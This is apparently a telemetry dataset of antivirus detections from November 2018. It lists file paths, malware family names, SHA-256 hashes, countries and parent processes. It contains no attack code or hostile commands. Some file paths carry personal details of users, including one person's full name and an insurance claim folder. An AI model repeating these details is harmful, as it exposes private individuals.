  Row(detection=Row(filename='avscan-20181104-205241-5444b219', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e3305e6\\AVSCAN-20181104-205010-3E708EA3\\AVSCAN-20181104-205241-5444B219', filesize=384000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='467169df66f73856c5e0ed2b0ef14608033c71496b3e36be1cccdc0f874c5c08', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:52:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lg_p710_es.htm', filepath='C:\\Program Files (x86)\\Octoplus\\Octoplus_LG\\MANUALS\\LG_P710_ES.htm', filesize=384000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='467169df66f73856c5e0ed2b0ef14608033c71496b3e36be1cccdc0f874c5c08', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=677024, timestamp='2018-11-04T19:21:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='4675105ff1283db6e639a8e6694f20ae5683701c228aee5ad9e4a1f05c2759c1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:41:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maxmin.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\asas\\bin\\winx64\\maxmin.exe', filesize=4096000, name='W32/Ramnit.CD.#M1.#R1'), hash='4676e9444b7c4c3605b8daa1063467b7e22625a9a7d0d9040dbf1a83c72bdf25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-04T14:56:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apiutil.exe', filepath='g:\\luisa\\studium\\topspin\\install-topspin-3.5pl2.tmp~\\windows\\bin\\apiutil.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='4682a5c1a07cdefd5b0db7496c9f21f8257c3be3ae87136287b1387d2f69e6ec', metadata=Row(cmdline='-administrator', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='G:\\Luisa\\Studium\\Topspin\\install-topspin-3.5pl2.tmp~\\windows\\tcl-8.5.16\\bin\\tclsh85.exe', parentsize=102912, timestamp='2018-11-04T14:22:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152343-a3439420', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_556d4981\\AVSCAN-20181104-152326-9FA772F9\\AVSCAN-20181104-152343-A3439420', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='4682a5c1a07cdefd5b0db7496c9f21f8257c3be3ae87136287b1387d2f69e6ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:23:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='posteriza_install-downloader.exe', filepath='\\\\DATENSERVER\\Daten\\DR-ACER-HOME-Joerg\\latest\\DRIVEE\\Downloads\\posteriza_install-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='47333a5fff555669fc1839f69f5e866732216ec9e3f332b2c218194ce682aa04', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T11:01:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='posteriza_install-downloader.exe', filepath='\\\\DATENSERVER\\Daten\\DR-ACER-HOME-Joerg\\20140817_181511\\DRIVEE\\Downloads\\posteriza_install-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='47333a5fff555669fc1839f69f5e866732216ec9e3f332b2c218194ce682aa04', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T15:08:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163804-583a182c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_12cb16c6\\AVSCAN-20181104-163727-5322CCE3\\AVSCAN-20181104-163804-583A182C', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='47333a5fff555669fc1839f69f5e866732216ec9e3f332b2c218194ce682aa04', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:37:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Applications/Mac Tonic.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.btuqv.#M0.#R0'), hash='4769980682ab8e7efcccff847a70944b55c079ecac65d03059a9924eab9ebe31', metadata=Row(cmdline=None, country='FR', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:28:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201134-ee303f47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e3305e6\\AVSCAN-20181104-201102-E98A4B3F\\AVSCAN-20181104-201134-EE303F47', filesize=384000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='479ec0b4e5878b4a73e8687317be6c8b8572a9141e08142f9728b3592c70d731', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lg_k350h_pt.htm', filepath='C:\\Program Files (x86)\\Octoplus\\Octoplus_LG\\MANUALS\\LG_K350H_PT.htm', filesize=384000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='479ec0b4e5878b4a73e8687317be6c8b8572a9141e08142f9728b3592c70d731', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=677024, timestamp='2018-11-04T19:10:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='regsvr32.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\아빠보험청구\\이중훈 영상CD\\Viewer\\ATL\\Regsvr32.exe', filesize=64000, name='TR/Patched.Gen.#M300.#R3369'), hash='47d2a52b49b64e35553fe4e302d5307e13f0e4be3bd287859cd7896f09cc21af', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:50:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='regsvr32.exe', filepath='C:\\Users\\X\\Desktop\\아빠보험청구\\이중훈 영상CD\\Viewer\\ATL\\Regsvr32.exe', filesize=64000, name='TR/Patched.Gen.#M300.#R3369'), hash='47d2a52b49b64e35553fe4e302d5307e13f0e4be3bd287859cd7896f09cc21af', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T06:49:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='$rrh6om5.dll', filepath='C:\\$Recycle.Bin\\S-1-5-21-3234532219-278635398-83401512-1001\\$RRH6OM5.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:10:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup (1).zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/MONITOR', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner.exe', parentsize=13797712, timestamp='2018-11-04T12:18:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-171759-d7b38207', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16cd0bb0\\AVSCAN-20181104-171548-BCEDC557\\AVSCAN-20181104-171759-D7B38207', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='174057444.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\174057444.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/DB', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T19:41:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='174059628.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\174059628.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/DB', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T19:41:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-235236-e1ca2961', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5c71a919\\AVSCAN-20181104-235218-DF477D8A\\AVSCAN-20181104-235236-E1CA2961', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:52:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-175019-3ae5c20a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_30c8b421\\AVSCAN-20181104-174942-36A5BB27\\AVSCAN-20181104-175019-3AE5C20A', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:50:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\MSTAR\\ISP MSTART\\Setup (6)\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T22:50:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151320-ed02d957', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e729151\\AVSCAN-20181104-151115-DAE9550A\\AVSCAN-20181104-151320-ED02D957', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:13:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18594760, timestamp='2018-11-04T16:48:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174237-fde344a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e5b5006\\AVSCAN-20181104-174117-ED7D5097\\AVSCAN-20181104-174237-FDE344A5', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215309-d792d750', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_26d84b62\\AVSCAN-20181104-215049-C8D3C2DA\\AVSCAN-20181104-215309-D792D750', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:53:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174227-fbd357e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e5b5006\\AVSCAN-20181104-174117-ED7D5097\\AVSCAN-20181104-174227-FBD357E9', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174214-f942c376', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e5b5006\\AVSCAN-20181104-174117-ED7D5097\\AVSCAN-20181104-174214-F942C376', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165817-699eb446', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5d4647a9\\AVSCAN-20181104-165758-65CADEAA\\AVSCAN-20181104-165817-699EB446', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:58:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.178\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner.exe', parentsize=13797712, timestamp='2018-11-04T08:57:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/recovered', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-04T08:02:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/recovered', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-04T08:02:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='171519252.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\171519252.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/DB', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T19:15:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-171736-d2fd4408', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16cd0bb0\\AVSCAN-20181104-171548-BCEDC557\\AVSCAN-20181104-171736-D2FD4408', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:17:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='171515729.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\171515729.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/DB', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T19:15:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='samp-server.exe', filepath='D:\\Games\\samp-server.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='48a4dba98cbe22be684c6cd6f5b8ccc44b53cf9276b939cb947184288be56b41', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T15:45:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mell.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Curtails\\mell.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='48b3294ebedde43151ade7342018800be31175d8f8f9b1fb075258e0ef1f65bb', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:51:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mell.exe', filepath='C:\\Program Files (x86)\\agitating\\mell.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='48b3294ebedde43151ade7342018800be31175d8f8f9b1fb075258e0ef1f65bb', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T18:03:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mell.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Curtails\\mell.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='48b3294ebedde43151ade7342018800be31175d8f8f9b1fb075258e0ef1f65bb', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:52:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mell.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Curtails\\mell.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='48b3294ebedde43151ade7342018800be31175d8f8f9b1fb075258e0ef1f65bb', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:53:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mell.exe', filepath='C:\\Program Files (x86)\\Curtails\\mell.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='48b3294ebedde43151ade7342018800be31175d8f8f9b1fb075258e0ef1f65bb', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T17:54:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mitmdump.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_02-18-07\\mitmdump.exe', filesize=5000000, name='HEUR/AGEN.1031272.#M1.#R1'), hash='491d9362db041c189aaf974ea3e1f21b824f12538f90fa6cf927bf0edc26c9af', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe21_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe21 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T01:18:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-audio-audiocore_31bf3856ad364e35_6.1.7601.23403_none_793a69235bf87c5b\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='493b4b4ed3e9159001087e3f70b0beab09c6dd2083b9d2883a7d2b943aa17606', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:53:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='set_homepage.exe.vir', filepath='\\\\?\\C:\\Windows\\System32\\oobe\\OEM\\Set_Homepage.exe.VIR', filesize=768000, name='HEUR/APC.#M1.#R1'), hash='493fb9580aac7ec665b8c3ba103c757a206508bb855a74ae0ae8a3eea326df4e', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:49:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ws73099cc142f48755-5c83e7b1120018de8c0-2450.htm', filepath='\\\\?\\D:\\Autodesk\\AutoCAD Structural Detailing 2012 - English\\Help\\filesMDG\\WS73099cc142f48755-5c83e7b1120018de8c0-2450.htm', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='494a47ebc274316fde017bd52a6c38beec591cd66639f2d728d2bb5ef9bf3237', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:07:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='opencv_haartraining.exe', filepath='E:\\Programs\\Developer Pro\\OpenCV\\opencv\\build\\x64\\vc11\\bin\\opencv_haartraining.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='4995d3ea19a3182b0a8eb26e6ad01e19f3aad925c41ff6fc2d77cec4ceaa3886', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESET\\ESET Security\\ekrn.exe', parentsize=2260144, timestamp='2018-11-04T08:57:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='opencv_haartraining.exe', filepath='\\\\?\\E:\\Programs\\Developer Pro\\OpenCV\\opencv\\build\\x64\\vc11\\bin\\opencv_haartraining.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='4995d3ea19a3182b0a8eb26e6ad01e19f3aad925c41ff6fc2d77cec4ceaa3886', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:58:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='opencv_haartraining.exe', filepath='\\\\?\\E:\\Programs\\Developer Pro\\OpenCV\\opencv\\build\\x64\\vc11\\bin\\opencv_haartraining.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='4995d3ea19a3182b0a8eb26e6ad01e19f3aad925c41ff6fc2d77cec4ceaa3886', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:21:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='opencv_haartraining.exe', filepath='E:\\Programs\\Developer Pro\\OpenCV\\opencv\\build\\x64\\vc11\\bin\\opencv_haartraining.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='4995d3ea19a3182b0a8eb26e6ad01e19f3aad925c41ff6fc2d77cec4ceaa3886', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESET\\ESET Security\\ekrn.exe', parentsize=2260144, timestamp='2018-11-04T07:21:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dresume.exe', filepath='c:\\microgaming\\casino\\luxury casino\\dresume.exe', filesize=1024000, name='GAME/Casino.Gen.#M1.#R1'), hash='49f7979921ed9e8a90658b1fa0837e9f0befe740bc52b793062a83f390650809', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:40:24Z'), dt=datetime.date(2018, 11, 4)),
